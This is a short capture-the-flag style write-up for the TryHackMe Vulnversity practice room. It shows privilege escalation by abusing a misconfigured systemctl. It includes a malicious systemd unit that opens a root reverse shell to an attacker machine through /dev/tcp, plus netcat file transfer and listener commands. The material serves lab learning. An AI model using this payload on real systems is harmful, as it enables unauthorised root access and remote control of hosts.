Progressive OSCP
  • Contents
  • Kali Configuration
    • Tmux
  • Brute Force
    • Hydra
  • Linux Privilege Escalation
  • TryHackMe Writeups
    • Vulnversity (Privilege Escalation)
    • Content Security Policy Writeup
Powered by GitBook
On this page

Was this helpful?

  1. TryHackMe Writeups

Vulnversity (Privilege Escalation)

Misconfigured Permissions — sudo/SUID

PreviousTryHackMe WriteupsNextContent Security Policy Writeup

Last updated 4 years ago

Was this helpful?

Practice box

0. Prepare your payload root.service

[Unit]
Description=roooooooooot

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1'

[Install]
WantedBy=multi-user.target

1. Find files/directories that writable

find -type f -maxdepth 2 -writable

or

find -type d -maxdepth 2 -writable

2. Transfer the payload(There might be other ways)

Init the target listening to the port

nc -vl 44444 > root.service

Send the file to target

nc -n TargetIP 44444 < root.service

3. Start listening on the 9999

nc -lvnp 9999

4. Execute the payload(assume the file is under /var/tmp)

/bin/systemctl enable /var/tmp/root.service
Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /var/tmp/root.service
Created symlink from /etc/systemd/system/root.service to /var/tmp/root.service
/bin/systemctl start root

5. The listening 9999 would give you the root

Expand Knowlege

6. Alternative solution:

https://tryhackme.com/room/vulnversity
https://gtfobins.github.io/gtfobins/systemctl/
https://stackoverflow.com/questions/2491985/find-all-writable-files-in-the-current-directory
https://www.maketecheasier.com/netcat-transfer-files-between-linux-computers/
https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49